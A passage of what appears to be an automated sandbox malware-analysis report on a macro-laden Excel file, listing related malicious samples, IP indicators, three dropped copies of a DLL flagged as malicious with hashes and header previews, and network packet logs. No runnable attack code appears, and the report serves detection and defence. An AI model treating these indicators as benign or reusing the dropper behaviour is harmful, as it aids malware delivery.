                                                                                                                                                                                      8f9b032ff6f56a685f4c6f9eb57784811d6c98aa83b0c.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      718421.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      Ln11IgJVUM.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      6c710694d270db91b550daf3177622514d2444e7484fb.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.225.75.73
                                                                                                                                                                                      QEiuTX6cTw.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.32.16.68
                                                                                                                                                                                      xDxD5fLpPC.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      YiIS9HvO21.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      AQvfg6cfsH.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      1hIvIzTHG5.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      0WX1X0cxwl.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      34EH2vRFeU.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      xl7FJ4h7YS.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      ciPe3thWYs.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      wD6XXcjb2g.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      KbflZxAKaI.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.222.157.68
                                                                                                                                                                                      voopeople.funDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      thousandsyears.downloadDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.198.51
                                                                                                                                                                                      uppercilio.funDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.55.83

                                                                                                                                                                                      ASN

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      CLOUDFLARENETUSDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      SMR8OzIgNB.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.8.151
                                                                                                                                                                                      Follow up Purchase order num- 4500262450.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.75.42
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.194.117
                                                                                                                                                                                      2790000.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      2770174.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.185.68
                                                                                                                                                                                      Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      rial exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      SCTc9qaix4.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 1.0.0.1
                                                                                                                                                                                      AFS Co., Ltd..exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.26.6.41
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      XoN2GgRiga.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.23.99.190
                                                                                                                                                                                      zeMISetSYn.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 172.67.188.154
                                                                                                                                                                                      q7p7x4f4gX.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.20.184.68
                                                                                                                                                                                      Delivery Reciept.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.159.130.233
                                                                                                                                                                                      ESDCO0098655.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      PO20210705.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 162.159.135.233
                                                                                                                                                                                      MT103_20210701084_USD35,660.93.EXEGet hashmaliciousBrowse
                                                                                                                                                                                      • 66.235.200.145
                                                                                                                                                                                      specifications and drawings.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 104.21.19.200
                                                                                                                                                                                      AMAZON-02USDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.4.74
                                                                                                                                                                                      GDTGz3GXCiNgYwtXT6qX3tY8eu8Mqj.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.231.168.212
                                                                                                                                                                                      39d0c1e7.msiGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.159.48
                                                                                                                                                                                      Movcy_v1.0.0.apkGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.39.180.2
                                                                                                                                                                                      order No. 00192099##001 pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.143.65.214
                                                                                                                                                                                      f6718e02bc73edf5aab341fa0a7f75782bc72f7dd1a6e.dllGet hashmaliciousBrowse
                                                                                                                                                                                      • 143.204.91.74
                                                                                                                                                                                      lZYIQJNUsZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.249.12.162
                                                                                                                                                                                      q62NZgHtRq.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 3.22.53.161
                                                                                                                                                                                      iGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.9.197.152
                                                                                                                                                                                      8zsiEeSTzI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.140.209
                                                                                                                                                                                      Request For Quotation.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 75.2.26.18
                                                                                                                                                                                      pip install.yp.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.18.63.80
                                                                                                                                                                                      Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.58.78.16
                                                                                                                                                                                      k6sy0WOByI.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.217.101.132
                                                                                                                                                                                      seBe6bgLTw.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.248.216.40
                                                                                                                                                                                      LfFcgieca8.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.79.124.173
                                                                                                                                                                                      apex-regulatory-changes-june2021.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 35.177.112.17
                                                                                                                                                                                      Y8rQSzIHgu.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.43.249.183
                                                                                                                                                                                      InBios wire 052521.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 18.189.203.42

                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      05af1f5ca1b87cc9cc9b25185115607dDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      108020075.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      G-DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      1.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL!.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order No. 211128.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      SOA.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      DECL G50 EURL.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      WO 378871.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 824126.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      PO 31449213.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      INS 2965424.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 161488.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73
                                                                                                                                                                                      Order 5122948.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                      • 13.224.92.73

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                        PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                            PI-210610.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlDeliveryConf535215.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                PI-210610.xlsmGet hashmaliciousBrowse

                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fml
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fml
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                  • Filename: DeliveryConf535215.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  • Filename: PI-210610.xlsm, Detection: malicious, Browse
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B690E83.png
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PNG image data, 1600 x 1600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):174009
                                                                                                                                                                                                  Entropy (8bit):7.967231122944825
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:4DusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/XO:CRcGUlFzy4mpTHdrUc3/SsYASj
                                                                                                                                                                                                  MD5:C0AF15BAE70AFFC4BE7625110AEEF09A
                                                                                                                                                                                                  SHA1:AEF94E038F0538C812AAF9EF605F76AF2376A26D
                                                                                                                                                                                                  SHA-256:D2F5852B2EF010150C0C8A980F25B715C6363A8C4454C711B9E9F2B2532F1657
                                                                                                                                                                                                  SHA-512:131DECBB06F1CE1A049BBF25B49615320FB4DC6DF5D3DA8B44EAE455D6ACC8AE12981BC108431DCC01D21EABFE1A552581C508F57FD3FDB7D7B06B5346522B2B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview: .PNG........IHDR...@...@.......~.....PLTE.....3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................(....tRNS...................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\Desktop\~$Purchaseconfirmation-137606.xlsm
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                                                                                                                                                  MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                                                                                                                                                  SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                                                                                                                                                  SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                                                                                                                                                  SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                  C:\Users\user\XRAY.dll
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\XTOWN.dll
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  C:\Users\user\XZIBIT.dll
                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):57856
                                                                                                                                                                                                  Entropy (8bit):4.963425128586394
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:wIZpbT9PDZE0ix9i33yS6AII5QiyWaTeQC9m6ny96/eQponqM:wypbTax9IyeIGhaaN9Hny962TnqM
                                                                                                                                                                                                  MD5:7A1D163990ACE9CEF1D43831866109AB
                                                                                                                                                                                                  SHA1:38A40E5AF9912C2935F74F2085D810A24325DC2A
                                                                                                                                                                                                  SHA-256:2B56EFDD9D771BCE51087101AC109C30B81E29E583C0178D33B90AD0128D9BA8
                                                                                                                                                                                                  SHA-512:454FBFD2C7BC18F47B02D67CA957D01A86E09EE4F4C6CAADF2CDF981478E90467C2B3BE750C293790016EB5AED757E8553FD2CB65242FB6C0D0E3A231291F247
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........M.M.M.>...N.M.K.M.I...L...L.RichM.........PE..d......`.........." .....:.......... .....................................................`.....................................................(....................................................................................P..@............................text...(8.......:.................. ..`.rdata..~....P.......>..............@..@.data...`...........................@....pdata..............................@..@........................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  Static File Info

                                                                                                                                                                                                  General

                                                                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                                                                  Entropy (8bit):7.9394014867391105
                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                                                                  • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                                                                  File name:Purchaseconfirmation-137606.xlsm
                                                                                                                                                                                                  File size:189905
                                                                                                                                                                                                  MD5:732851906622ca3c151360bdfda8b3f2
                                                                                                                                                                                                  SHA1:8a365e71a0fc1f1ae38faef239ab085001b5f83f
                                                                                                                                                                                                  SHA256:89aabd4ab6b696b3e9f74a04f27c4bc12f90b3a30855a403767ed525baec1736
                                                                                                                                                                                                  SHA512:418e1d04b0e5d11296554ecd0c9cfaf6cf414a416cea3088c15ee5c01baa304c7315d1688b2782627bcd791ae00b8c8757c48bf4afee6faaa79929980c4a8a34
                                                                                                                                                                                                  SSDEEP:3072:iDusrJcGUAUpF2e/RIiZmxjTH0Fq2yIyJFZqcN+KCiSsYErzSK/Xvpk:QRcGUlFzy4mpTHdrUc3/SsYASx
                                                                                                                                                                                                  File Content Preview:PK..........!....7............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                                  File Icon

                                                                                                                                                                                                  Icon Hash:e4e2aa8aa4bcbcac

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.387799978 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.426961899 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.430182934 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.430273056 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.469665051 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506335974 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506375074 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506395102 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506411076 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506428003 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506448984 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506469965 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506489992 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506499052 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506510973 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506525993 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506530046 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506531954 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506544113 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.506568909 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.507344007 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.507378101 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.507436991 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.508522987 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.508553982 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.508594036 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.508615971 CEST4916580192.168.2.22172.67.198.51
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.509344101 CEST8049165172.67.198.51192.168.2.22
                                                                                                                                                                                                  Jul 6, 2021 15:12:20.509391069 CEST8049165172.67.198.51192.168.2.22
